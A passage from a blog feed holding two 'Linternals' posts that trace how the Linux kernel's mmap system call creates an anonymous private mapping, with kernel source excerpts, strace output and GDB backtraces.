#3  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900006bbf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
#4  do_syscall_64 (regs=0xffffc900006bbf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83
#5  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121</code></pre><p>Not much happens when we return back to <code>do_mmap()</code>, other than deciding how many pages, if any, need to be populated, before returning to <code>vm_mmap_pgoff()</code>. This function will then drop the mmap write lock and do any relevant userfaultfd and population bits. </p><p>Although out of scope, populating a mapping essentially involves doing what we&apos;re going to cover in the next section (writing to memory) now, instead of waiting to access it.</p><p>Then we&apos;re pretty much back in userspace, with a shiny new (or merged) mapping!</p><h3 id="summary">Summary</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/confused.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="504" height="322"></figure><p>It&apos;s only been, uh, 6000 words or so but just like that we&apos;ve covered this line of code:</p><pre><code>addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);</code></pre><p>We did a whistle-stop (?!) tour of the <code>mmap()</code> system call, focusing on how private, anonymous mappings are created and managed by the kernel. </p><p>We got some first hand experience of how the <code>struct mm_struct</code> helps manages a processes memory, including the <code>mm-&gt;mm_mt</code> tree which tracks the memory areas within the processes virtual address space, which are represented by <code>struct vm_area_struct</code>.</p><p>We also dived into some implementation details, covering some of the security mechanisms and checks, how unused addresses for new mappings are found and the different cases that need to be considered when mapping a new region.</p><hr><ol><li>If you&apos;re curious why <code>mmap_min_addr</code> is a thing, this mitigation was added way back in 2009 for 2.X kernels. For context then, <a href="https://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html">check out this post from 2009</a> on bypassing it. For a bonus, there was <a href="https://googleprojectzero.blogspot.com/2023/01/exploiting-null-dereferences-in-linux.html">a semi recent P0 post</a> about modern NULL ptr deref exploitation. </li><li><a href="https://www.kernel.org/doc/html/next/userspace-api/mseal.html">https://www.kernel.org/doc/html/next/userspace-api/mseal.html</a></li></ol><h2 id="next-time">Next Time</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/weary_pc.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="435" height="250"></figure><p>Wow, I may have got a bit lost in the sauce for this one (sorry)... Hopefully this is useful for someone. This time we covered the first portion of our simple program: mapping memory. Next time, we&apos;ll move onto writing to memory. Buckle up, as that&apos;ll involve a deep dive into how the kernel does all things (*specifically pertaining to our case study) paging, starting with page faults and going from there (wish me luck).</p><p>That said, I think my next post might be more exploitation focused, both for my own sanity after this 6000 word linternals dump and also as it&apos;s been a while since I published some security stuff. Anyways, like I said, I&apos;m hoping this post bordered more on the &quot;in depth but verbose walkthrough of linux internals&quot; and not &quot;mad ramblings of someone who overcommitted to an ambitious series&quot;.</p><p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>]]></content:encoded></item><item><title><![CDATA[Linternals: Exploring The mm Subsystem via mmap [0x01]]]></title><description><![CDATA[In this series we'll explore the Linux kernel's memory management subsystem, using a simple userspace program as our starting point.]]></description><link>https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/</link><guid isPermaLink="false">67010c30de619fc1154ef57d</guid><category><![CDATA[linternals]]></category><category><![CDATA[memory]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Mon, 16 Dec 2024 14:00:01 GMT</pubDate><media:content url="https://sam4k.com/content/images/2024/10/linternals.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2024/10/linternals.gif" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]"><p>That&apos;s right, you&apos;re not hallucinating, Linternals is back! It&apos;s been a <em>while</em>, I know, but after some travelling and moving to a new role, I&apos;ve finally found some time to ramble.</p><p>For those of you unfamiliar with the series (or have understandably forgotten that it existed), I&apos;ve covered several topics relating to kernel memory management previously:</p><ul><li><a href="https://sam4k.com/linternals/#virtual-memory">The &quot;Virtual Memory&quot; series</a> of posts discusses the differences between physical and virtual memory, exploring both the user and kernel virtual address spaces</li><li><a href="https://sam4k.com/linternals/#memory-allocators">The series on &quot;Memory Allocators&quot;</a> covers the role of memory allocators in general before moving onto to detailing the kernel&apos;s page and slab allocators </li></ul><p>This post might be a little different, as I&apos;m writing this introduction before I&apos;ve actually planned 100% what I&apos;ll be writing about. I know I want to explore the memory management (mm) subsystem in more detail, building on what we&apos;ve covered so far, but the issue is...</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/idk_where_to_begin.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="480" height="270"></figure><p>There&apos;s a LOT to this subsystem, it&apos;s integral to the kernel and interacts with lots of other components. This had me thinking - how do I cover this gargantuan, messy topic in a structured and accessible way?! Where do I begin?? What do I cover???</p><p>My plan is to take a leaf out of how I would normally approach researching a new topic like this: start with a high level action (e.g. what the user sees) and follow the source, building up an understanding of the relevant structures and API as we go.</p><p>So we&apos;ll take a simple action - mapping and writing to some (anonymous) memory in userspace - and see how deep we can go into the kernel, exploring what is actually going on under the hood. <em>Hopefully</em> this will provide an interesting and informative read, giving some insights on some of the key structures and functions of the kernel&apos;s mm subsystem. </p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x1F427;</div><div class="kg-callout-text">This post is based on the latest kernel at the time of writing, 6.11.5, and x86_64.</div></div><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#what-is-memory-management">What is Memory Management?</a></li>
<li><a href="#overview-of-the-mm-subsystem">Overview of The MM Subsystem</a>
<ul>
<li><a href="#representing-memory">Representing Memory</a></li>
<li><a href="#allocating-memory">Allocating Memory</a></li>
<li><a href="#mapping-memory">Mapping Memory</a></li>
<li><a href="#managing-memory">Managing Memory</a></li>
</ul>
</li>
<li><a href="#getting-lost-in-the-source">Getting Lost in The Source</a></li>
<li><a href="#mapping-memory-1">Mapping Memory</a>
<ul>
<li><a href="#entering-the-kernel">Entering The Kernel</a></li>
<li><a href="#x64sysmmap"><code>__x64_sys_mmap()</code></a></li>
<li><a href="#ksysmmappgoff"><code>ksys_mmap_pgoff()</code></a></li>
<li><a href="#vmmmappgoff"><code>vm_mmap_pgoff()</code></a>
<ul>
<li><a href="#fetching-our-mmstruct">Fetching Our <code>mm_struct</code></a></li>
<li><a href="#a-bit-of-security">A Bit Of Security</a></li>
<li><a href="#locking">Locking</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#next-time">Next Time</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="what-is-memory-management">What is Memory Management? </h2><p>So before we get stuck into the nitty-gritty details, let&apos;s talk about what we mean by memory management. Fortunately, unlike some of the topics we&apos;ve covered (I&apos;m looking at you SLUB), this one&apos;s fairly self explanatory: it&apos;s about managing a system&apos;s memory.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/lets_break_it_down.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="480" height="270"></figure><p>Memory, in this sense, covers the range of storage a modern system may use: HDDs and SSDs, RAM, CPU registers and caches etc. Managing this involves providing representations of the various types of memory and means for the kernel and userspace to efficiently access and utilise them.</p><p>Let&apos;s take the everyday (and oversimplified) example of running a program on our computer. We can see involvement of memory management every step of the way:</p><ul><li>First, the program itself is stored on disk and must be read</li><li>It is then loaded into RAM, where the physical address in memory is mapped into our process&apos; virtual address space; commonly loaded data will make use of caches</li><li>We&apos;ve talked about how the kernel and userspace have their own virtual address spaces, with their own mappings and protections which need to be managed</li><li>Then we have the execution of the code itself which will make use of various CPU registers, it will also need to ask the kernel to do privileged things via system calls, so we also need to consider the transition between userspace and the kernel!</li></ul><p>Hopefully this highlights how fundamental the memory management subsystem is and gives a glimpse at its many responsibilities. </p><h2 id="overview-of-the-mm-subsystem">Overview of The MM Subsystem</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/tell_me_more.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="635" height="340"></figure><p>Okay, what does this <em>actually</em> look like? The kernel has several <a href="https://docs.kernel.org/subsystem-apis.html">core subsystems</a>, one of which is the <a href="https://docs.kernel.org/mm/index.html">memory management subsystem</a>. Looking at the kernel source tree, this is located in the aptly named <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm">mm/</a></code> subdirectory. </p><p>I figured we could highlight some of the key files in there to give a sense of the subsystems role and structure in a more tangible context. Like many of my decisions, this turned out to be harder than I thought, but we&apos;ll give it a go. </p><h3 id="representing-memory">Representing Memory</h3><p>To be able to manage memory, we need to be able represent it in a way the kernel can work with. There are a number of key structures used by the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm">mm/</a></code> subsystem, many of which can be found in <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h">include/linux/mm_types.h</a>. This includes:</p><ul><li>Representations for chunks of physically contiguous memory (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L72">struct page</a></code>) and the tables used to organise how this memory is accessed.</li><li>The <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">struct mm_struct</a></code> provides a description of a process&apos; virtual address space, including its different areas of virtual memory (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664">struct vm_area_struct</a></code>).</li><li>The <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code> also includes a pointer to the upper most table (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L806">pgd_t * pgd</a></code>) which is used to map our process&apos; virtual addresses to a specific page in physical memory. </li></ul><h3 id="allocating-memory">Allocating Memory</h3><p>With our memory represented, we need a way to actually make use of it! The various allocation mechanisms fall under the memory management subsystem, providing ways to manage the pool of available physical memory and allocate it to be used. This includes:</p><ul><li>The page allocator (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/page_alloc.c">mm/page_alloc.c</a></code>) for allocating physically contiguous memory of at least <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/page_types.h#L11">PAGE_SIZE</a></code>.</li><li>The slab allocator for the efficient allocation of (physically contiguous) objects, via the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687">kmalloc()</a></code> API. <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab.h">mm/slab.h</a></code> and <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab_common.c">mm/slab_common.c</a></code> define the common API, while the SLUB implementation can be found at <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/slub.c">mm/slub.c</a></code>.</li><li><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c">mm/vmalloc.c</a></code> provides an alternative API for allocating <em><strong>virtually</strong></em> contiguous memory and is used for large allocations that may be hard to find physically contiguous space for. E.g. <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L817">kvmalloc()</a></code> will <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687">kmalloc()</a></code> but use <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144">vmalloc()</a></code> as a fallback!</li></ul><h3 id="mapping-memory">Mapping Memory</h3><p>So far we&apos;ve touched mainly on how to manage physical memory, but as we know there&apos;s a lot more to it than that! Sure, we can map chunks of physical memory into our virtual address space to work on, but what about stuff that sits on disk?</p><ul><li><code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap(2)</a></code> (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1521">mm/mmap.c</a></code>) is one-stop shop for userspace mappings and allows us to map physical memory into our processes&apos; virtual address space so we can access it. This can be anonymous memory (i.e. just a chunk of physical memory for us to use) or it can also be used to map a previously opened file into physical memory too!</li><li><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/filemap.c">mm/filemap.c</a></code> contains some core, generic, functionality for managing file mappings, including the use of a page cache for file data. This can then be utilised by file systems when they <code><a href="https://man7.org/linux/man-pages/man2/read.2.html">read(2)</a></code> or <code><a href="https://man7.org/linux/man-pages/man2/write.2.html">write(2)</a></code> files for example. </li><li>The <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322">ioremap()</a></code> API ( is used for mapping device memory into the kernel virtual address space. An example would be a GPU kernel driver mapping some GPU memory into the kernel virtual address so it can access it. If you recall the <a href="https://sam4k.com/linternals-virtual-memory-part-3/#kernel-virtual-memory-map">post on the kernel virtual address space</a>, you&apos;ll see that the kernel memory map has a specific region for <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322">ioremap()</a></code>/<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144">vmalloc()</a></code>&apos;d memory! And why do they share memory? Because under the hood <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322">ioremap()</a></code> uses the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404">vmap()</a></code> API...</li><li>The <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404">vmap()</a></code> API allows the kernel to map a set of physical pages to a range of a contiguous virtual addresses (within the vmalloc/ioremap space) space. As we&apos;ve mentioned, this used by both <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144">vmalloc()</a></code> and <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322">ioremap()</a></code>. As a result you can find some functionality for all of them in <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c">mm/vmalloc.c</a></code>.</li></ul><h3 id="managing-memory">Managing Memory</h3><p>We&apos;ve talked a lot about the building blocks for managing memory, but what about actual high level management of memory? Well there&apos;s plenty of that too!</p><ul><li>There are a number of syscalls found in <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm">mm/</a></code> related to memory management: <code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap(2)</a></code> and <code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">munmap(2)</a></code> for managing mappings, <code><a href="https://man7.org/linux/man-pages/man2/mprotect.2.html">mprotect(2)</a></code> for managing access protections of mappings, <code><a href="https://man7.org/linux/man-pages/man2/madvise.2.html">madvise(2)</a></code> for giving the kernel advise on how to handle mapped pages, <code><a href="https://man7.org/linux/man-pages/man2/mlock.2.html">mlock(2)</a></code> and <code><a href="https://man7.org/linux/man-pages/man2/mlock.2.html">munlock(2)</a></code> to un/lock memory in RAM etc.</li><li>We also have other key management functionality such as how to handle when the system runs out of memory (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/oom_kill.c">mm/oom_kill.c</a></code>) and the memory control groups (memcgs, <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/memcontrol.c">mm/memcontrol.c</a></code>) which provide a way to manage the resources available to specific groups of processes. </li><li><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/swapfile.c">mm/swapfile.c</a></code> allows us to allocate &quot;swap&quot; files. This allows the kernel to use the a portion of disk space (the swap file) as an extension of physical memory. When physical memory availability is low, the kernel will &quot;swap&quot; out inactive/old pages of physical memory to the swap file in order to free up physical memory.</li></ul><h2 id="getting-lost-in-the-source">Getting Lost in The Source</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/going_on_an_adventure.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="500" height="200"></figure><p>Alright, here&apos;s the plan: we will begin our journey with a simple C program that maps some anonymous memory, writes to it and then unmaps it. Sounds easy enough right?</p><p>To refresh, &quot;mapping&quot; memory essentially involves pointing some portion of our processes virtual address space to somewhere in physical memory. This could be a file read into physical memory, but we can also map &quot;anonymous&quot; memory. This is just physical memory that has been allocated specifically for this mapping and wasn&apos;t previously tied to a file. But we&apos;ll get into that more shortly, for now, here&apos;s the code:</p><pre><code class="language-C">#include &lt;sys/mman.h&gt;

int main()
{
    void *addr;

    addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    *(long*)addr = 0x4142434445464748;

    munmap(addr, 0x1000);
    return 0;
}
</code></pre><p>So what&apos;s going on here? We map <code>0x1000</code> bytes (i.e. a page) of anonymous memory into our virtual address space, pointed to by <code>addr</code>. We then write 8 bytes, <code>0x4142434445464748</code>, to that address (which points to a page in physical memory). With our work done, we then unmap the anonymous memory and exit.</p><p>Okay, now we understand what the program is doing from a user&apos;s perspective - we&apos;re just writing some bytes to some physical memory we allocated. But what&apos;s the kernel actually doing under the hood? The primary API between the userspace and the kernel is system calls, so we can use <code><a href="https://man7.org/linux/man-pages/man1/strace.1.html">strace</a></code> to understand how our little program interacts with the kernel. Perhaps unsurprisingly, it&apos;s not too dissimilar: </p><pre><code>&gt; strace ./mm_example
// snip (process setup)
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f487ed24000
munmap(0x7f487ed24000, 4096)            = 0
exit_group(0)
+++ exited with 0 +++</code></pre><p>The libc <code>mmap()</code> and <code>munmap()</code> calls are just wrappers around the respective system calls, which we can see here. The only part of the program that doesn&apos;t use system calls is when we write to the memory, but as we&apos;ll soon see, that doesn&apos;t mean the kernel isn&apos;t involved!</p><h2 id="mapping-memory-1">Mapping Memory</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/kermit_map.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="400" height="256"></figure><p>So let&apos;s start our dive into into the kernel with seeing how memory is mapped.</p><pre><code class="language-C">void *mmap(void addr[.length], size_t length, int prot, int flags,
                  int fd, off_t offset);
int munmap(void addr[.length], size_t length);
</code></pre><p><code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap(2)</a></code> is the system call which &quot;creates a new mapping in the virtual address space of the calling process&quot;, for usage information check out the man page. </p><p>In our case we&apos;re creating a mapping of <code>0x1000</code> bytes, AKA <code>PAGE_SIZE</code>. We want to be able to read and write to it, so have specified the <code>PROT_READ | PROT_WRITE</code> protection flags. As we touched on before, we&apos;re not mapping a file or anything, so we specify <code>MAP_ANONYMOUS</code> - we just want to map a page of unused physical memory. </p><p>We also specify <code>MAP_PRIVATE</code>, which in the context of an anonymous mapping means that this mapping won&apos;t be shared with other processes, for example if we fork a child process. More broadly speaking it means &quot;Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file.&quot; <sup><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">[1]</a></sup>.</p><p>Finally, because it&apos;s an anonymous mapping the file descriptor and offset fields are ignored (some implementations require the <code>fd</code> to be -1, so that&apos;s why we set it) as we&apos;re not mapping a file in which we might want to map from a specific offset within. </p><h3 id="entering-the-kernel">Entering The Kernel</h3><p>Okay, so we understand the system call from a userspace perspective, how do we go about understanding how it&apos;s implemented? Well, without going into detail on how system calls work, we can generally find out a system calls &quot;entry point&quot; in the kernel by grepping the source for <code>SYSCALL_DEFINE.*&lt;syscall name&gt;</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">SYSCALL_DEFINE6(mmap, unsigned long, addr, unsigned long, len,
		unsigned long, prot, unsigned long, flags,
		unsigned long, fd, unsigned long, off)
{
	if (off &amp; ~PAGE_MASK)
		return -EINVAL;

	return ksys_mmap_pgoff(addr, len, prot, flags, fd, off &gt;&gt; PAGE_SHIFT);
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79">arch/x86/kernel/sys_x86_64.c</a> (v6.11.5)</figcaption></figure><p>Check out the macros over in <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/syscalls.h">include/linux/syscalls.h</a></code> if you&apos;re curious; this will also explain how to figure out the actual symbol for kernel debugging (spoiler: it&apos;s <code>__x64_sys_&lt;name&gt;</code> in our case). </p><p>That said, <code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap(2)</a></code> was a terrible example for this little auditing tidbit as there&apos;s actually a lot of results for <code>SYSCALL_DEFINE.*mmap</code>. This is due to architecture specific implementations and legacy versions. If you wanted to be extra sure you can compare the arguments and architecture, or even whip out a debugger and break further in (e.g. on <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">do_mmap()</a></code>) <sup>[2]</sup> and check the back trace:</p><figure class="kg-card kg-code-card"><pre><code>(gdb) bt
#0  do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, flags=flags@entry=34, 
    pgoff=pgoff@entry=0, populate=0xffffc900004f7d08, uf=0xffffc900004f7d28) at mm/mmap.c:1408
#1  0xffffffff81890ae1 in vm_mmap_pgoff (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, 
    flag=flag@entry=34, pgoff=pgoff@entry=0) at mm/util.c:551
#2  0xffffffff819139db in ksys_mmap_pgoff (addr=&lt;optimized out&gt;, len=8192, prot=prot@entry=3, flags=34, fd=&lt;optimized out&gt;, 
    pgoff=&lt;optimized out&gt;) at mm/mmap.c:1624
#3  0xffffffff810beff6 in __do_sys_mmap (addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=3, flags=&lt;optimized out&gt;, fd=&lt;optimized out&gt;, 
    off=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:93
#4  __se_sys_mmap (addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=3, flags=&lt;optimized out&gt;, fd=&lt;optimized out&gt;, off=&lt;optimized out&gt;)
    at arch/x86/kernel/sys_x86_64.c:86
#5  __x64_sys_mmap (regs=0xffffc900004f7f58) at arch/x86/kernel/sys_x86_64.c:86
#6  0xffffffff81008c2e in x64_sys_call (regs=regs@entry=0xffffc900004f7f58, nr=&lt;optimized out&gt;)
    at ./arch/x86/include/generated/asm/syscalls_64.h:10
#7  0xffffffff83be17a6 in do_syscall_x64 (regs=0xffffc900004f7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:50
#8  do_syscall_64 (regs=0xffffc900004f7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:80
#9  0xffffffff83e00124 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:119</code></pre><figcaption>Backtrace from a 5.15 kernel using GDB</figcaption></figure><h3 id="x64sysmmap"><code>__x64_sys_mmap()</code></h3><figure class="kg-card kg-code-card"><pre><code class="language-c">SYSCALL_DEFINE6(mmap, unsigned long, addr, unsigned long, len,
		unsigned long, prot, unsigned long, flags,
		unsigned long, fd, unsigned long, off)
{
	if (off &amp; ~PAGE_MASK) // [0]
		return -EINVAL;

	return ksys_mmap_pgoff(addr, len, prot, flags, fd, off &gt;&gt; PAGE_SHIFT /* [1] */);
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79">arch/x86/kernel/sys_x86_64.c</a> (v6.11.5)</figcaption></figure><p>Now we have a starting point, let&apos;s start exploring! <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79">__x64_sys_mmap()</a></code> starts off validating the <code>off</code> field, making sure it&apos;s page aligned (i.e. a multiple of <code>PAGE_SIZE</code>) [0] and then shifting it so that <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1476">ksys_mmap_pgoff()</a></code> gets the page offset (instead off the byte offset) [1].</p><h3 id="ksysmmappgoff"><code>ksys_mmap_pgoff()</code></h3><figure class="kg-card kg-code-card"><pre><code class="language-C">unsigned long ksys_mmap_pgoff(unsigned long addr, unsigned long len,
			      unsigned long prot, unsigned long flags,
			      unsigned long fd, unsigned long pgoff)
{
	struct file *file = NULL;
	unsigned long retval;

	if (!(flags &amp; MAP_ANONYMOUS)) {
		// SNIP, we have this flag set!
	} else if (flags &amp; MAP_HUGETLB) {
		// SNIP, we don&apos;t have this flag set!
	}

	retval = vm_mmap_pgoff(file, addr, len, prot, flags, pgoff);
out_fput:
	if (file)
		fput(file);
	return retval;
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1476">mm/mmap.c</a> (v6.11.5)</figcaption></figure><p>Well this one&apos;s nice and simple for us anonymous mappers! As there&apos;s no <code>file</code> involved and we&apos;re not using huge pages<sup><a href="https://docs.kernel.org/admin-guide/mm/hugetlbpage.html">[3]</a></sup> we cruise on into <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">vm_mmap_pgoff()</a></code>.</p><h3 id="vmmmappgoff"><code>vm_mmap_pgoff()</code></h3><p>Hopefully we&apos;re warmed up now, as we&apos;ve got a bit more going on here! </p><figure class="kg-card kg-code-card"><pre><code class="language-C">unsigned long vm_mmap_pgoff(struct file *file, unsigned long addr,
	unsigned long len, unsigned long prot,
	unsigned long flag, unsigned long pgoff)
{
	unsigned long ret;
	struct mm_struct *mm = current-&gt;mm;          // [0]
	unsigned long populate;
	LIST_HEAD(uf);

	ret = security_mmap_file(file, prot, flag);  // [1]
	if (!ret) {
		if (mmap_write_lock_killable(mm))    // [2]
			return -EINTR;
		ret = do_mmap(file, addr, len, prot, flag, 0, pgoff, &amp;populate,
			      &amp;uf);
		mmap_write_unlock(mm);
		userfaultfd_unmap_complete(mm, &amp;uf);
		if (populate)
			mm_populate(ret, populate);
	}
	return ret;
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">mm/util.c</a> (v6.11.5)</figcaption></figure><h4 id="fetching-our-mmstruct">Fetching Our <code>mm_struct</code></h4><p>First we fetch a reference to an <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code> [0], which as we covered earlier, is a key structure that provides a description of a process&apos; virtual address space. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2024/12/image.png" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="720" height="382" srcset="https://sam4k.com/content/images/size/w600/2024/12/image.png 600w, https://sam4k.com/content/images/2024/12/image.png 720w" sizes="(min-width: 720px) 720px"><figcaption>stolen from some of my old slides</figcaption></figure><p>But whose <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code> are we grabbing? The kernel maintains a thread (i.e. a kernel stack) for each userspace process. When a userspace process makes a system call, the kernel executes in the &quot;context&quot; of that process, using it&apos;s associated kernel stack. </p><p>Along with its own kernel stack, each process has a <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758">task_struct</a></code> &#xA0;which keeps important data about the process such as its <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code>. When the kernel is executing in a processes&apos; context, it can fetch the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758">task_struct</a></code> of the associated userspace process via <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52">current</a></code>. </p><p><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52">current</a></code> is a definition for <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L44">get_current()</a></code> which returns the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758">task_struct</a></code> of the &quot;current&quot; kernel thread, from there we can fetch our <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code> from the task&apos;s <code>mm</code> member.</p><h4 id="a-bit-of-security">A Bit Of Security</h4><p>Next up we do some security checks [1], via <code>security_mmap_file()</code>. Generally, if we see a kernel function with the <code>security_</code> prefix it&apos;s a hook belonging to the kernel&apos;s modular security framework<sup><a href="https://docs.kernel.org/admin-guide/LSM/index.html">[6]</a></sup>. </p><p>Looking at the code we&apos;ll notice two definitions<sup><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053">[4]</a><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849">[5]</a></sup>, depending on if <code><a href="https://cateee.net/lkddb/web-lkddb/SECURITY.html">CONFIG_SECURITY</a></code> is enabled. We&apos;ll consider the default case, where it is enabled:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">/**
 * security_mmap_file() - Check if mmap&apos;ing a file is allowed
 * @file: file
 * @prot: protection applied by the kernel
 * @flags: flags
 *
 * Check permissions for a mmap operation.  The @file may be NULL, e.g. if
 * mapping anonymous memory.
 *
 * Return: Returns 0 if permission is granted.
 */
int security_mmap_file(struct file *file, unsigned long prot,
		       unsigned long flags)
{
